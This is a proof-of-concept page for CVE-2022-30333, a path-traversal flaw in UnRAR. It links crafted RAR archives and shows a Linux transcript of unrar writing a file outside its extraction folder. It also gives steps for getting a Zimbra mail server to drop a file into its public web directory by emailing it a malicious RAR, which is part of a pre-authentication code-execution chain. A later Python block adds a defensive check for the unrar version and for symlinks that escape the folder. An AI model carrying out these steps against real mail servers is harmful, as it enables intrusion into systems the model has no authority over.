## https://sploitus.com/exploit?id=A573E62D-1BE0-5CD3-8E6D-EB184127464A
# CVE-2022-30333-POC 
**Sample file to test CVE-2022-30333**
- [Sample.rar](./sample.rar): for testing on Linux. When extracted, it creates **trav** in **../../tmp/traversed**. Make sure the directory **../../tmp/traversed** exists before extracting Sample.rar.

- [exp.rar](./exp.rar): for testing on a Zimbra mail server. When extracted, it creates **moo.txt** in */opt/zimbra/jetty\_base/webapps/zimbra/public/*. You can access this file at https://zimbra_mail_domain/public/moo.txt
## EXPLOITATION STEPS
### Testing on Linux
```
mkdir ../../tmp/traversed   # the destination folder must exist before running unrar

ls -la ../../tmp/traversed/
total 8
drwxrwxr-x 2 ubuntu ubuntu 4096 Jul  4 02:44 .
drwxrwxr-x 4 ubuntu ubuntu 4096 Jul  4 02:40 ..

unrar x exp.rar

UNRAR 6.10 beta 1 freeware      Copyright (c) 1993-2021 Alexander Roshal

Corrupt header is found
sym - the file header is corrupt

Extracting from exp.rar

Corrupt header is found
sym - the file header is corrupt
Extracting  sym                                                       OK 
Extracting  sym/trav                                                  OK 
Total errors: 4

ls -la ../../tmp/traversed/
total 12
drwxrwxr-x 2 ubuntu ubuntu 4096 Jul  4 02:47 .
drwxrwxr-x 4 ubuntu ubuntu 4096 Jul  4 02:40 ..
-rw-rw-r-- 1 ubuntu ubuntu   14 Jul  4 02:34 trav

cat ../../tmp/traversed/trav
"traversed"
```
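
A check for the behaviour in the transcript above, added here as an example and not part of the original PoC: it reads the unrar banner to see whether the binary predates the fix, then audits an extraction directory for symlinks (like `sym`) that resolve outside it. The function names and the constructed directory tree are assumptions; the 6.12 fixed version comes from the CVE-2022-30333 record, not from this page.

```python
import os
import re
import tempfile

# CVE-2022-30333 is fixed in RARLAB UnRAR 6.12 (from the CVE record, not this page).
FIXED = (6, 12)

def unrar_is_vulnerable(banner: str) -> bool:
    """Parse the version from an unrar banner line such as the one in the transcript."""
    m = re.search(r"UNRAR\s+(\d+)\.(\d+)", banner)
    if m is None:
        raise ValueError("no UNRAR version found in banner")
    return (int(m.group(1)), int(m.group(2))) < FIXED

def escaping_symlinks(root: str) -> list:
    """Return (link path relative to root, raw target) for links resolving outside root."""
    root_real = os.path.realpath(root)
    hits = []
    # followlinks=False: never descend through a symlinked directory while auditing.
    for dirpath, dirnames, filenames in os.walk(root, followlinks=False):
        for name in dirnames + filenames:
            path = os.path.join(dirpath, name)
            if not os.path.islink(path):
                continue
            resolved = os.path.realpath(path)
            if os.path.commonpath([root_real, resolved]) != root_real:
                hits.append((os.path.relpath(path, root), os.readlink(path)))
    return sorted(hits)

def demo() -> list:
    """Constructed tree mirroring the transcript: sym -> ../../tmp/traversed."""
    with tempfile.TemporaryDirectory() as base:
        root = os.path.join(base, "a", "b", "extract")
        os.makedirs(root)
        os.makedirs(os.path.join(base, "a", "tmp", "traversed"))
        os.symlink("../../tmp/traversed", os.path.join(root, "sym"))  # escapes root
        open(os.path.join(root, "note.txt"), "w").close()
        os.symlink("note.txt", os.path.join(root, "ok"))  # stays inside root
        return escaping_symlinks(root)

if __name__ == "__main__":
    line = "UNRAR 6.10 beta 1 freeware      Copyright (c) 1993-2021 Alexander Roshal"
    print("vulnerable unrar:", unrar_is_vulnerable(line))
    print("escaping links:", demo())
```

Run `escaping_symlinks()` on a scratch directory used only for extraction, before anything in it is read or moved elsewhere.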
### Testing on Zimbra
- Create an email, attach the malicious RAR file, and send it to a Zimbra email address. The RAR file is extracted while Amavisd analyzes it.
- The moo.txt file should then be at: */opt/zimbra/jetty\_base/webapps/zimbra/public/moo.txt* or *https://zimbra_mail_domain/public/moo.txt*

## REFERENCES
1. [Vietnamese blog from DEV2SEC](https://dev2sec.tech/security/zimbra-pre-auth-rce/)
2. [English blog from Sonarsource](https://blog.sonarsource.com/zimbra-pre-auth-rce-via-unrar-0day/)
3. Special thanks to **mrlihd** for helping me rebuild the attack chain in Zimbra